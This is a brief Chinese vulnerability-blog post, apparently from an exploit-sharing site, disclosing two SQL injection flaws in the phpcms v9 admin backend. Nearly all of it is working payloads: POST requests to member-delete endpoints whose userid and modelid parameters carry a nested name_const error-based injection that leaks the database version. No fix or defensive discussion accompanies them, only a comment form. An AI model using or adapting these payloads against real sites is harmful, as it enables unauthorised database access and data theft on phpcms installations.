phpcms两处后台的SQL注入

  • A+
所属分类:漏洞时代
摘要

(一):http://www.0day5.com/phpcmsv9/index.php?m=member&c=member&a=delete&pc_hash=GlyB7G&id

(一):

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member&a=delete&pc_hash=GlyB7G&id

post

userid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

 

 

 

(二):

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member_model&a=delete&pc_hash=GlyB7G

post

modelid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: